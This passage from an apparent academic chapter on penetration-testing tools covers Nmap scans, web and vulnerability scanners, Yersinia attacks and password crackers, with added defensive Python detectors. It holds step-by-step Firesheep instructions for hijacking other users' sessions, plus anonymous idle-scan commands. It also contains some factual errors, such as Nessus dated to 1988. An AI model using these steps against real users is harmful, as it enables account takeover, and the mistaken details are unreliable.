an option, because the SYN scan requires root privilege. Unlike the TCP SYN scan, it completes the
normal TCP three-way handshake process and requires the system to call connect(), which is part of the
operating system. Keep in mind that this technique is only applicable to finding TCP ports, not
UDP ports. Example: # nmap -sT 192.168.1.1

UDP Scan (-sU): As the name suggests, this technique is used to find the open UDP ports of the target
machine. It does not require any SYN packet to be sent because it is targeting the UDP ports, but we can
make the scanning more effective by using -sS along with -sU. A UDP scan sends UDP packets to the
target machine and waits for a response: if an ICMP port unreachable error message arrives,
it means that the port is closed, but if it gets an appropriate response, it means that the port is
open. Example: # nmap -sU 192.168.1.1

FIN scan (-sF): Sometimes a normal TCP SYN scan is not the best solution, because a firewall,
intrusion detection system (IDS) or intrusion prevention system (IPS) might be deployed on the
target machine, and a firewall will usually block the SYN packets. A FIN scan sends packets with only
the FIN flag set, so it is not required to complete the TCP handshake.
Example: root@bt:~# nmap -sF 192.168.1.8
Ping scan (-sP): Ping scanning is unlike the other scan techniques because it is only used to find out
whether the host is alive or not. It is not used to discover open ports. Ping scans require root access so that
ICMP can be sent, but if the user does not have administrator privilege then the ping scan uses the
connect() call. Example: # nmap -sP 192.168.1.9


Version Detection (-sV): Version detection is the technique used to find out what software
version is running on the target computer and on the respective ports. It is unlike the other scanning
techniques because it is not used to detect open ports, but it requires the information from open ports
to detect the software version. In the first step of this scan technique, version detection uses the TCP
SYN scan to find out which ports are open. Example: # nmap -sV 192.168.1.8

Idle scan (-sI): Idle scan is one of my favorite techniques, and it is an advanced scan that provides
complete anonymity while scanning. In an idle scan, Nmap doesn't send the packets from your real IP
address; instead of generating the packets from the attacker machine, Nmap uses another host from the
target network to send the packets. Let's consider an example to understand the concept of idle scan.
Example: # nmap -sI ait_host target_host
# nmap -sI 192.168.1.2 192.168.1.5

The idle scan technique is used to discover the open ports on 192.168.1.5 while it uses ait_host
(192.168.1.2) to communicate with the target host, so this is an idle technique to scan the target
computer anonymously.
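Added example, not from the thesis: the half-open SYN scan described above avoids an application-level log on the target, but a sensor on the wire still sees SYNs that are never followed by a completed handshake. The Python below classifies constructed packet records (a tcpdump-like one-line form; all addresses, ports and timestamps are assumed) into full, half-open, closed, no-reply and FIN-probe flows, then lists sources that probed many ports without ever completing a handshake.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

# Constructed records, not real traffic, in a tcpdump-like one-line form:
#   <ts> <src>:<sport> > <dst>:<dport> [<TCP flags>]
# 192.168.1.50 SYN-scans 192.168.1.8 (22 and 80 open, the rest closed) and sends
# one bare FIN probe; 192.168.1.20 is an ordinary client completing a handshake.
SAMPLE_LOG = """\
0.001 192.168.1.50:40001 > 192.168.1.8:21 [S]
0.002 192.168.1.8:21 > 192.168.1.50:40001 [RA]
0.003 192.168.1.50:40002 > 192.168.1.8:22 [S]
0.004 192.168.1.8:22 > 192.168.1.50:40002 [SA]
0.005 192.168.1.50:40002 > 192.168.1.8:22 [R]
0.006 192.168.1.50:40003 > 192.168.1.8:25 [S]
0.007 192.168.1.8:25 > 192.168.1.50:40003 [RA]
0.008 192.168.1.50:40004 > 192.168.1.8:80 [S]
0.009 192.168.1.8:80 > 192.168.1.50:40004 [SA]
0.010 192.168.1.50:40004 > 192.168.1.8:80 [R]
0.011 192.168.1.50:40005 > 192.168.1.8:443 [S]
0.012 192.168.1.8:443 > 192.168.1.50:40005 [RA]
0.013 192.168.1.50:40006 > 192.168.1.8:3306 [S]
0.014 192.168.1.8:3306 > 192.168.1.50:40006 [RA]
0.015 192.168.1.50:40007 > 192.168.1.8:8080 [F]
0.100 192.168.1.20:51000 > 192.168.1.8:80 [S]
0.101 192.168.1.8:80 > 192.168.1.20:51000 [SA]
0.102 192.168.1.20:51000 > 192.168.1.8:80 [A]
"""

FlowKey = Tuple[str, int, str, int]  # (client, client port, server, server port)


@dataclass(frozen=True)
class Packet:
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # TCP flag letters, e.g. "S", "SA", "A", "R", "RA", "F"


def parse_log(text: str) -> List[Packet]:
    packets = []
    for line in text.splitlines():
        ts, src, _arrow, dst, flags = line.split()
        s_ip, s_port = src.rsplit(":", 1)
        d_ip, d_port = dst.rsplit(":", 1)
        packets.append(Packet(float(ts), s_ip, int(s_port), d_ip, int(d_port), flags.strip("[]")))
    return packets


def _verdict(seen: Set[str]) -> str:
    if {"syn", "synack", "ack"} <= seen:
        return "full"       # completed handshake: a connect() scan or a real client
    if {"syn", "synack"} <= seen:
        return "half-open"  # SYN-ACK answered with RST, never ACKed: the -sS signature
    if {"syn", "rst"} <= seen:
        return "closed"     # server refused with RST
    if "syn" in seen:
        return "no-reply"   # filtered or dropped by a firewall
    if "fin" in seen:
        return "fin-probe"  # bare FIN with no SYN: the -sF signature
    return "other"


def classify_flows(packets: Iterable[Packet]) -> Dict[FlowKey, str]:
    """Group packets into client/server flows, track the handshake stages seen
    in each, and label every flow with a verdict."""
    stages: Dict[FlowKey, Set[str]] = {}
    for p in packets:
        fwd: FlowKey = (p.src, p.sport, p.dst, p.dport)
        rev: FlowKey = (p.dst, p.dport, p.src, p.sport)
        if fwd in stages:
            key, from_client = fwd, True
        elif rev in stages:
            key, from_client = rev, False
        else:  # first packet of a flow decides who the client is
            key, from_client = fwd, True
            stages[key] = set()
        seen = stages[key]
        if p.flags == "S" and from_client:
            seen.add("syn")
        elif p.flags == "SA" and not from_client:
            seen.add("synack")
        elif p.flags == "A" and from_client and "synack" in seen:
            seen.add("ack")
        elif "R" in p.flags:
            seen.add("rst")
        elif p.flags == "F" and from_client:
            seen.add("fin")
    return {key: _verdict(seen) for key, seen in stages.items()}


def suspected_scanners(verdicts: Dict[FlowKey, str], min_ports: int = 5) -> Dict[str, List[Tuple[str, int]]]:
    """Sources that touched at least min_ports distinct (host, port) targets
    without ever completing a handshake."""
    probed: Dict[str, Set[Tuple[str, int]]] = defaultdict(set)
    for (client, _cport, server, sv_port), verdict in verdicts.items():
        if verdict != "full":
            probed[client].add((server, sv_port))
    return {src: sorted(ports) for src, ports in probed.items() if len(ports) >= min_ports}
```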

Firesheep: Is a Firefox add-on that has recently become very popular for easily carrying out an HTTP
session hijacking attack. An HTTP session hijacking attack can't be considered a very sophisticated attack,
but it needs some technical knowledge to be performed; Firesheep, however, makes the attack child's play.
Firesheep was developed by Eric Butler for the Firefox browser. It was released at Toorcon 12 to
demonstrate how serious cookie stealing can be.
When you provide your username and password in the login forms of different websites and submit them, the
browser first encrypts the password and then sends it over the network. The corresponding website
compares the information against its internal database and, if they match, it sends a cookie (a small text
file) to your browser. The browser saves this cookie and uses it to authenticate the user on the website
every time the user opens a different page of the website.
When the user logs out of his/her account, the browser just deletes the cookie. Now the problem is that
the cookies are not encrypted before being sent over the network; due to this, a hacker can capture these
cookies and use them to authenticate himself/herself as the user from whom the cookies were stolen.
Now let's see how to use Firesheep.

First download and install WinPcap (WinPcap is a Windows library used for capturing network traffic).
Download and open Firesheep in Firefox; it will install automatically, or just drag it and drop it over the
Firefox shortcut. After it is installed, in Firefox go to View > Sidebar > Firesheep. A sidebar will
appear in the browser with a button "Start Capturing"; press it and sit back. In a few seconds you will see
account details with photos from the target machine. Click on one of them and you will directly enter his/her
account.
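Added defensive example, not part of the thesis: the capture above works because the session cookie travels in clear text and the browser will resend it over plain HTTP. This Python audits the Set-Cookie headers of a response for the properties that stop such replay (issued over HTTPS, the Secure flag, HttpOnly on session cookies, and a Strict-Transport-Security header); the two embedded responses, one weak and one hardened, are constructed samples, not captures from any real site.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample responses (scheme, header list); not captured from any real site.
WEAK_RESPONSE: Tuple[str, List[Tuple[str, str]]] = ("http", [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/"),
])
HARDENED_RESPONSE: Tuple[str, List[Tuple[str, str]]] = ("https", [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "theme=dark; Path=/; Secure"),
])

# Name fragments that usually mark an authentication cookie (a heuristic).
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class CookieFinding:
    name: str
    problems: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Dict[str, str]:
    """Split one Set-Cookie value into its name/value pair and attributes.
    Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to ''."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    parsed = {"__name__": name.strip(), "__value__": value.strip()}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        parsed[key.strip().lower()] = val.strip()
    return parsed


def audit_response(scheme: str, headers: List[Tuple[str, str]]) -> List[CookieFinding]:
    """Report, for every cookie the response sets, the weaknesses that let a
    passive sniffer on the same network capture and replay it."""
    has_hsts = any(k.lower() == "strict-transport-security" for k, _ in headers)
    findings = []
    for key, value in headers:
        if key.lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(value)
        finding = CookieFinding(cookie["__name__"])
        session_like = any(h in cookie["__name__"].lower() for h in SESSION_HINTS)
        if scheme != "https":
            finding.problems.append("issued over plaintext HTTP: readable by anyone on the path")
        if "secure" not in cookie:
            finding.problems.append("missing Secure: the browser will also send it over http://")
        if session_like and "httponly" not in cookie:
            finding.problems.append("missing HttpOnly: session cookie readable by page scripts")
        if session_like and not has_hsts:
            finding.problems.append("no Strict-Transport-Security: a later visit can be downgraded to http://")
        findings.append(finding)
    return findings


def is_hardened(scheme: str, headers: List[Tuple[str, str]]) -> bool:
    """True when no cookie in the response has any finding."""
    return all(not f.problems for f in audit_response(scheme, headers))


if __name__ == "__main__":
    for f in audit_response(*WEAK_RESPONSE):
        print(f.name, f.problems)
    print("hardened response ok:", is_hardened(*HARDENED_RESPONSE))
```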

3.3.3 Wireless Discovery and Scanning Tools


Kismet: Is an 802.11 wireless network detector, sniffer, and intrusion detection system. Kismet will
work with any wireless card which supports raw monitoring mode, and can sniff 802.11b, 802.11a, 802.11g,
and 802.11n traffic (devices and drivers permitting).
Kismet also sports a plugin architecture allowing additional non-802.11 protocols to be decoded.
Kismet identifies networks by passively collecting packets and detecting networks, which allows it to
detect hidden networks and the presence of non-beaconing networks via data traffic.
While Kismet is an open source product and very powerful, one downside to Kismet is its relative
complexity. It works best on Linux or Berkeley Software Distribution (BSD), and also works on
Windows when using the AirPcap packet capture hardware.

Wireshark, a network analysis tool formerly known as Ethereal, captures packets in real time and
displays them in human-readable format. Wireshark includes filters, colour-coding and other features
that let you dig deep into network traffic and inspect individual packets. The units of data that
Wireshark inspects are called frames, which contain packets. Wireshark has the ability to capture all of
the packets that are sent and received over your network, and it can decode them for analysis. When
you do anything over the internet, such as browse websites or use VoIP, IRC etc., the data is always
converted into packets when it passes through your network interface or LAN card.
Wireshark will hunt for those packets in your TCP/IP layer during the transmission and it will keep
and present this data in its own GUI.
It is important to note that whilst this is an excellent tool for a network administrator who needs to
check that their customers' sensitive data is being transmitted securely, it can also be used by hackers
on unsecured networks, such as airport WiFi. The moral of the story at this point is to steer clear of
clear-text HTTP: that is the best advice we can give. To remedy this we would encourage you to use a
Firefox add-on called HTTPS Everywhere or use an SSH or VPN tunnel.
Wireshark as a packet sniffer is an application which can capture and analyze network traffic which is
passing through a system's Network Interface Card (NIC). The sniffer sets the card to promiscuous
mode, which means all traffic is read, whether it is addressed to that machine or not. The figure below
shows an attacker sniffing packets from the network, and the Wireshark packet sniffer/analyzer
(formerly known as Ethereal).

Figure 3.17

Figure 3.18 Wireshark Packets Sniffer interface.

3.3.4 Web Application Discovery /Scanning Tools

Burp Suite is an integrated platform for attacking web applications. It contains all of the
Burp tools with numerous interfaces between them, designed to facilitate and speed up the
process of attacking an application. All tools share the same robust framework for handling
HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan,
attack and exploit web applications. The various Burp tools work together effectively to share
information and allow findings identified within one tool to form the basis of an attack using
another.
Burp Suite is made up of the following tools;
Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web
applications. It operates as a man-in-the-middle between the end browser and the target
web server, and allows the user to intercept, inspect and modify the raw traffic passing in both
directions.
Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent
techniques to generate a comprehensive inventory of an application's content and
functionality.
Scanner: Burp Scanner is a tool for performing automated discovery of security
vulnerabilities in web applications. It is designed to be used by penetration testers, and to
fit in closely with your existing techniques and methodologies for performing manual
and semi-automated penetration tests of web applications.
Intruder: Burp Intruder is a tool for automating customized attacks against web
applications.
Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP
requests, and analyzing their responses. It is best used in conjunction with the other Burp
Suite tools. For example, you can send a request to Repeater from the target site map,
from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and
manually adjust the request to fine-tune an attack or probe for vulnerabilities.
Sequencer: Burp Sequencer is a tool for analyzing the degree of randomness in an
application's session tokens or other items on whose unpredictability the application
depends for its security.
Comparer: Burp Comparer is a simple tool for performing a comparison (a visual diff)
between any two items of data. In the context of attacking a web application, this
requirement will typically arise when you want to quickly identify the differences
between two application responses (for example, between two responses received in the
course of a Burp Intruder attack, or between responses to failed logins using valid and
invalid usernames), or between two application requests (for example, to identify request
parameters that give rise to different behaviour).
To begin using Burp Suite for testing, we need to configure our web browser to use Burp
Suite as a proxy. The Burp Suite proxy uses port 8080 by default, but you can change it if you
want.
You can see a proxy being configured in the image below.

Figure 3.19 Proxy settings configuration window interface.

Once Burp Suite is started, it is recommended to define your target host in the scope. This allows
you to control what is displayed in the site map, and other Burp features. Scope can be defined
by adding a target host, IP, or network range:

Figure 3.20 showing BurpSuite tool interface.

WebScarab is a framework for analyzing applications that communicate using the HTTP and
HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has
several modes of operation, implemented by a number of plugins. In its most common usage,
WebScarab operates as an intercepting proxy, allowing the operator to review and modify
requests created by the browser before they are sent to the server, and to review and modify
responses returned from the server before they are received by the browser. WebScarab is able to
intercept both HTTP and HTTPS communication.
The operator can also view the conversations (requests and responses) that have passed through
WebScarab.
An important feature of WebScarab is its ability to record, and therefore audit, traffic for further
review.

Nikto is a vulnerability scanner that scans web servers for thousands of vulnerabilities and other
known issues. It is very easy to use and does everything itself, without much instruction.
Nikto is a very popular (open source) web server scanner which is able to execute in-depth scans
and tests against web servers seeking vulnerabilities. The program scans for nearly 10,000 known
dangerous files and programs and also has the additional huge benefit of checking for outdated
versions of 1,250 servers. As a result Nikto is hugely popular amongst system administrators.
Nikto also verifies server configuration items such as:
Multiple index files
HTTP/HTTPS server configuration (correct port listings)
Identify web server info and identify for stealth.
There are many options for using Nikto; this is one of the basic forms of the syntax:

nikto -h <IP or Hostname>

Let us start with the HTTP service on a machine on the network, scanning its web server. Let's scan
it for vulnerabilities by typing: nikto -h 192.168.1.104. Nikto responds with a lot of
information, as you can see below in figure 3.21

Figure 3.21
First, it tells us the server is Apache 2.2.14, probably on Ubuntu. It nails this information and gives
up more about other potential vulnerabilities on this web server.
Features of the Nikto web scanner are as follows;
Supports SSL
Supports full HTTP proxy
Supports text, HTML, XML and CSV formats for saving reports
Scans multiple ports
Can scan multiple servers by taking input from files such as Nmap output
Supports LibWhisker IDS
Capable enough to identify installed software via headers, files and favicons
Logs for Metasploit
Reports unusual headers
Apache and cgiwrap user enumeration
Scans can be auto-paused at a specified time.

3.4. VULNERABILITY ANALYSIS

3.4.1 Vulnerability scanning tools

Nmap is a security scanner used to discover hosts and services on a computer network, thus
creating a map of the network. To accomplish its goal, Nmap sends specially crafted packets to
the target host and then analyzes the responses. Unlike many simple port scanners that just send
packets at some predefined constant rate, Nmap accounts for the network conditions during the
run.
Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a
host is up or down and which ports are open and closed.
Nmap can determine the operating system of the target, the names and versions of the listening
services, estimated uptime, the type of device, and the presence of a firewall.
OpenVAS: The Open Vulnerability Assessment System, known more commonly as OpenVAS,
is a framework of several services and tools offering a comprehensive and powerful vulnerability
scanning and vulnerability management solution.

Architecture Overview

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and
tools. The core of this SSL-secured service-oriented architecture is the OpenVAS scanner. The
scanner very efficiently executes the actual Network Vulnerability Tests (NVTs), which are served
with daily updates via the OpenVAS NVT Feed or via a commercial feed service.

Figure 3.22

The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into
a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS
Transfer Protocol) and it offers the XML-based, stateless OpenVAS Management Protocol
(OMP). All intelligence is implemented in the Manager so that it is possible to implement various
lean clients that will behave consistently, e.g. with regard to filtering or sorting scan results. The
Manager also controls a SQL database (SQLite-based) where all configuration and scan result data
is centrally stored.
The OpenVAS Administrator acts as a command line tool or as a full service daemon offering
the OpenVAS Administrator Protocol (OAP). The most important tasks are user management
and feed management.
The OpenVAS Scanner offers the communication protocol OTP (OpenVAS Transfer Protocol),
which allows control of scan execution. The protocol is subject to eventual replacement and
thus it is not recommended to develop OTP clients.
OpenVAS is among the tools integrated in the Kali Linux operating system for penetration
testing.
Nessus was founded by Renaud Deraison in 1988 to provide the internet community with a free
remote security scanner. It is one of the full-fledged vulnerability scanners that allow you to
detect potential vulnerabilities in systems. Nessus is the world's most popular vulnerability
scanning tool and is supported by most research teams around the world.
Nessus uses a web interface to set up, scan, and view reports.
The key features of Nessus can be identified as follows;
Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system
Checks whether the systems in the network have the latest software patches
Tries default passwords and common passwords on system accounts
Configuration audits
Vulnerability analyses
Mobile device audits
Customized reporting

Nessus uses a client/server design that allows the user to set up one Nessus server to which
multiple Nessus clients can attach and initiate vulnerability scans.

Figure 3.23 Nessus client/server architecture: the Nessus client connects over SSL to the server running the Nessus daemon, which scans the target systems.

Once the client/server configuration is done, Nessus runs on port 8834 by default and can be
accessed with any Flash-enabled web browser. There are four navigation tabs at the top of the
Nessus window interface, which are;
Reports: The Reports tab lists the results of scans you have conducted, are currently
running or have imported.
Scans: The Scans tab lists currently running scans, scan templates and scheduled scans.
Policies: The Policies tab lists the scan configurations available for scans.
Users: The Users tab lists users and allows the addition, deletion or editing of user
accounts.

3.4.2 Network vulnerability scanner tools


Cisco Global Exploiter (CGE): It is an advanced, simple and fast security testing tool/exploit
engine that is able to exploit 14 vulnerabilities in disparate Cisco switches and routers. CGE is a
command-line driven Perl script which has a simple and easy to use front-end.
Cisco Global Exploiter can exploit the following 14 vulnerabilities:
1. Cisco 677/678 Telnet Buffer Overflow Vulnerability
2. Cisco IOS Router Denial of Service Vulnerability
3. Cisco IOS HTTP Auth Vulnerability
4. Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
5. Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
6. Cisco 675 Web Administration Denial of Service Vulnerability
7. Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
8. Cisco IOS Software HTTP Request Denial of Service Vulnerability
9. Cisco 514 UDP Flood Denial of Service Vulnerability
10. Cisco Secure ACS for Windows NT Server Denial of Service Vulnerability
11. Cisco Catalyst Memory Leak Vulnerability
12. Cisco CatOS Cisco View HTTP Server Buffer Overflow Vulnerability
13. 0 Encoding IDS Bypass Vulnerability (UTF)
14. Cisco IOS HTTP Denial of Service Vulnerability
This software tool can be run on the BackTrack operating system for penetration testing.

Yersinia is a free open source utility written entirely in C which is great for security
professionals, penetration testers and hacking enthusiasts alike. Yersinia is a solid framework for
analyzing and testing network protocols, and it is a great network tool designed to take advantage
of some weaknesses in different network protocols. Yersinia allows you to send raw VLAN
Trunking Protocol (VTP) packets and also allows you to add and delete VLANs from a centralized
point of origin.
One of the useful features of Yersinia is the Dynamic Host Configuration Protocol (DHCP)
attack. A DHCP starvation attack works by broadcasting DHCP requests with spoofed
MAC addresses. This is easily accomplished with Yersinia; if enough requests are sent, the
network attacker can exhaust the address space available to the DHCP provider for a period of
time. With Yersinia, every DHCP client, regardless of whether it is connected via a wired or wireless
link, loses its network connection. Once the attack is stopped the DHCP clients can reconnect and are
able to use the network again.
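From the defender's side, the starvation attack just described is visible in the DHCP server's own log. The following added example (not from the thesis) slides a time window over DHCPDISCOVER lines and alerts on a burst of distinct client MACs and on the server reporting an empty pool; the log lines are constructed in the style of ISC dhcpd and the field layout is an assumption.

```python
"""Added example (not from the thesis): spot the DHCP starvation attack
described above from a DHCP server's syslog. Starvation shows up as a burst of
DHCPDISCOVER messages from many never-before-seen MAC addresses, followed by
'no free leases' once the pool is exhausted. The log lines are constructed
sample input in the style of ISC dhcpd; the exact field layout is an
assumption, so adjust LINE_RE for your own server's format."""
import re
from collections import deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ dhcpd: "
    r"(?P<msg>DHCP[A-Z]+) from (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})(?P<rest>.*)$"
)


def parse_line(line):
    """Return (timestamp, message type, client MAC, pool_exhausted) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # OFFER/ACK lines and other noise are not needed here
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog has no year
    return ts, m.group("msg"), m.group("mac"), "no free leases" in m.group("rest")


def detect_starvation(lines, window_s=10, mac_threshold=20):
    """Slide a time window over DISCOVERs; alert when too many distinct
    client MACs appear inside it, and when the server reports an empty pool."""
    recent = deque()  # (timestamp, mac) of DISCOVERs inside the window
    alerts = []
    burst_reported = pool_reported = False
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, msg, mac, exhausted = parsed
        if exhausted and not pool_reported:
            alerts.append((ts, "pool exhausted: server logged 'no free leases'"))
            pool_reported = True
        if msg != "DHCPDISCOVER":
            continue
        recent.append((ts, mac))
        while (ts - recent[0][0]).total_seconds() > window_s:
            recent.popleft()
        distinct = {m for _, m in recent}
        if len(distinct) >= mac_threshold and not burst_reported:
            alerts.append((ts, "%d distinct MACs sent DHCPDISCOVER within %ds"
                           % (len(distinct), window_s)))
            burst_reported = True
    return alerts


def make_sample_log():
    """Constructed log: normal traffic, then 30 spoofed clients in five seconds."""
    lines = [
        "Mar  3 10:00:01 gw dhcpd: DHCPDISCOVER from 00:11:22:33:44:55 via eth0",
        "Mar  3 10:00:01 gw dhcpd: DHCPOFFER on 192.168.1.20 to 00:11:22:33:44:55 via eth0",
        "Mar  3 10:02:17 gw dhcpd: DHCPDISCOVER from 00:11:22:33:44:66 via eth0",
    ]
    for i in range(30):  # six spoofed MACs per second, as a starvation tool would send
        lines.append("Mar  3 10:05:%02d gw dhcpd: DHCPDISCOVER from 02:00:00:00:00:%02x via eth0"
                     % (i // 6, i))
    lines.append("Mar  3 10:05:05 gw dhcpd: DHCPDISCOVER from 02:00:00:00:00:ff via eth0: "
                 "network 192.168.1.0/24: no free leases")
    return lines


if __name__ == "__main__":
    for ts, reason in detect_starvation(make_sample_log()):
        print(ts.strftime("%H:%M:%S"), reason)
```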
Yersinia also runs as a network daemon (# yersinia -D) and allows you to set up a server in each
network segment so that network administrators can access their networks. Yersinia listens on
TCP port 1200 by default and allows you to analyze the network packets traversing the
network.
This is very useful because you can determine the misconfigurations on your network segment
and correct them before an attacker takes advantage of them. With Yersinia you can also launch
Hot Standby Router Protocol (HSRP) attacks. The first option for sending HSRP packets is
simply sending custom HSRP packets, with which you can then test HSRP implementations on the
local network segment. Another option is becoming the active router with a fake IP, which results in a
Denial of Service (DoS). You can also launch a Man in the Middle (MITM) attack by becoming
the active router: by editing the HSRP packet fields of the attacked routers, enabling IP
forwarding on the attacker's machine and providing a valid static route to the legitimate gateway,
the traffic from the victim's machine will go through the attacker's platform and will be
subject to analysis and/or tampering.
Only two disadvantages of the Yersinia tool are worthy of mention. The first is that it was
created solely for the *nix community and is not available for the Windows platform. The Yersinia
team has requested that the community contribute to the Windows platform, so that all the Windows
enthusiasts can benefit. Secondly, Yersinia is written in Spanish.

3.5: ATTACKING PHASE


3.5.1: Gaining Access Tools (Password Access Tools)

There are many password breaking access tools; these are some of the commonest:
THC Hydra
Dbpwaudit
Cisco-audit-tool
Onesixtyone
Acccheck
John the Ripper
Ophcrack

I am using this opportunity to elaborate on the functions of a few of the listed tools.
THC-Hydra is a classic password cracking tool. Strictly speaking, Hydra is a network
logon password cracking tool, which is actually very fast. A great feature of Hydra is that you
can add modules to increase the functionality of this hacking tool.
THC Hydra is a software project developed by van Hauser from the organization called The
Hacker's Choice (THC) and David Maciejak. It uses a dictionary attack to test for weak or
simple passwords on one or many remote hosts running a variety of different services. It was
designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen
passwords.
THC Hydra is a parallelized login cracker which supports numerous protocols to attack; however,
this tool is proof-of-concept code, to give researchers and security consultants the possibility to
show how easy it would be to gain unauthorized remote access to a system. This tool is for
legal purposes only.
There are already several login hacker tools available; however, none of them supports more
than one protocol to attack or supports parallelized connects. It was tested to compile cleanly on
Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.
Currently this tool supports the following protocols:
TELNET, FTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, IRC,
RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP,
Subversion/SVN, Firebird, Cisco AAA (incorporated in the telnet module). For HTTP, POP3, IMAP
and SMTP, several login mechanisms such as plain and MD5 digest are supported.

Cisco-auditing-tool is integrated in the BackTrack 5 operating system. The cisco-auditing-tool, located
in the BackTrack menu (Backtrack > Vulnerability Assessment > Network Assessment > Cisco
Tools), is written in Perl and accomplishes three tasks, which include attempting to brute force the
telnet password on a Cisco device if telnet is running.
This tool is fairly outdated, as most Cisco devices in corporate networks should now be using
SSH, and it would seem surprising, unless you are doing an internal audit, if SNMP was exposed
for any Cisco devices still in service.

John the Ripper is a popular dictionary-based password cracking tool. It uses a wordlist full of
passwords and then tries to crack a given password hash using each of the passwords from the
wordlist. In other words, it performs brute force password cracking, which is the most basic form of
password cracking. It is also the most time- and CPU-consuming technique: the more passwords
there are to try, the more time is required.
John is different from tools like Hydra. Hydra does blind brute forcing by trying
username/password combinations against a service daemon like an FTP server or telnet server. John,
however, needs the hash first. So the greater challenge for a hacker is to first get the hash that is
to be cracked. Nowadays hashes are more easily crackable using free rainbow tables available
online. Just go to one of the sites, submit the hash and, if the hash is made of a common word, the
site will show the word almost instantly.
Rainbow tables basically store common words and their hashes in a large database. The larger the
database, the more words covered.
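The reason a precomputed table answers "almost instantly" is that an unsalted hash of a common word is the same everywhere, so it can be computed once and looked up forever. The following added example (not from the thesis) builds such a lookup table from a small wordlist, recovers passwords from a constructed unsalted dump with no hashing at all, and then shows that a per-user salt makes the table useless and forces every guess to be rehashed per user.

```python
"""Added example (not from the thesis): why the precomputed lookup behind
John the Ripper's wordlist mode and rainbow tables breaks unsalted hashes,
and why a per-user salt forces the attacker back to hashing every guess for
every user. The wordlist and the 'leaked' password dumps are constructed."""
import hashlib
import os

# Constructed wordlist standing in for a real dictionary file.
WORDLIST = ["password", "letmein", "qwerty", "summer2014", "dragon"]


def build_lookup_table(words, algo="md5"):
    """Precompute hash -> word once; a rainbow table is a compressed form of this."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def crack_with_table(table, dump):
    """Unsalted hashes: each recovery is a single dictionary lookup, no hashing."""
    return {user: table.get(h.lower()) for user, h in dump.items()}


def salted_hash(word, salt, algo="sha256"):
    """Store hash(salt || word) next to the salt; the salt is public but per user."""
    return hashlib.new(algo, salt + word.encode()).hexdigest()


def crack_salted(words, dump, algo="sha256"):
    """Salted hashes: the table is useless, every guess must be rehashed per
    user. Returns (recovered, number of hash computations performed)."""
    recovered, work = {}, 0
    for user, (salt, h) in dump.items():
        recovered[user] = None
        for w in words:
            work += 1
            if hashlib.new(algo, salt + w.encode()).hexdigest() == h:
                recovered[user] = w
                break
    return recovered, work


# Constructed: three users chose wordlist passwords, one did not.
CHOSEN = {"alice": "password", "bob": "letmein", "carol": "dragon", "dave": "Xq!9vT#2pL"}


def make_unsalted_dump():
    return {u: hashlib.md5(p.encode()).hexdigest() for u, p in CHOSEN.items()}


def make_salted_dump():
    dump = {}
    for u, p in CHOSEN.items():
        salt = os.urandom(16)
        dump[u] = (salt, salted_hash(p, salt))
    return dump


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted, table lookup:", crack_with_table(table, make_unsalted_dump()))
    salted = make_salted_dump()
    print("salted, table lookup:",
          crack_with_table(table, {u: h for u, (s, h) in salted.items()}))
    print("salted, per-user rehash:", crack_salted(WORDLIST, salted))
```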
Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient
implementation of rainbow tables done by the inventors of the method; it comes with a
graphical interface and runs on multiple platforms.
Ophcrack is an open source program that cracks Windows passwords by using LM hashes
through rainbow tables. The program includes the ability to import the hashes from a variety of
formats, including dumping directly from the Security Account Manager (SAM) files of
Windows. It is claimed that these tables can crack 99.9% of alphanumeric passwords of up to 14
characters in usually a few minutes.
Features of Ophcrack are the following;
Runs on Windows, Linux/Unix, Mac OS X
Cracks LM and NTLM hashes
Free tables available for Windows XP and Vista
Brute-force module for simple passwords
Audit mode and CSV export
Real-time graphs to analyze the passwords
LiveCD available to simplify the cracking
Loads hashes from an encrypted SAM recovered from a Windows partition, Vista included
Free and open source software (GPL)

